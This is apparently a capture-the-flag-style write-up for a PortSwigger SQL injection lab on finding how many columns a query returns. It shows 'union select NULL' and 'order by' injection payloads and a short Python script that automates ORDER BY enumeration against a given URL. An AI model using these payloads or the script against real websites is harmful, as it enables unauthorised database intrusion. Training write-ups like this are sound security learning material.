SQL injection UNION attack, determining the number of columns returned by the query

https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns

Level: Practitioner

In the following, we need to enumerate the number of columns that are in the database in use.

We can do that by using the following union select payload.
After " 'union select " write NULL spaces followed by a coma, and when the server throws back an "Internal Server Error" it means that we passed through the number of columns, the number of columns is the number of NULL spaces.

Here we can see that the database that we are using haves 3 columns, thanks to the number of NULL spaces.
We can do the same with an "order by".
I create a simple python script that enumerates how many columns are in the DB by just passing the URL, retrieves the payload used.

This will be useful in case where the columns are a huge number.

#!/usr/bin/python3

import requests

url = '<url>'

orderby_ = "' order by "

print("[+] Enumerating Columns")

for i in range(1, 100):

        orderby_ = f"' order by %d" % i

        sqli_column_enum = url + orderby_ + "--"

        r = requests.get(sqli_column_enum)

        if "Internal Server Error" in r.text:
                i = i - 1
                null = 'NULL'
                print(f"[+] number of columns %d \n" % i)

                sqli_column_enum = url + "' order by " + f'%d' % i + '--'

                print("[=] Order by Payload : ", sqli_column_enum)
                break

PreviousPractioner NextSQL injection UNION attack, finding a column containing text

Last updated 3 years ago